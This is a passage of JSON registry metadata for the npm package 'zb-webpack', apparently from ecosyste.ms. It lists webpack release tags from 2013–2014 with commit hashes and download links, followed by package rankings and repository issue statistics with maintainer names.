baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T04:42:00.843Z","dependent_packages_count":0,"downloads":7,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":54.90282062971637,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":23.501326522931826},"purl":"pkg:npm/zb-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/zb-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/zb-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/zb-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/s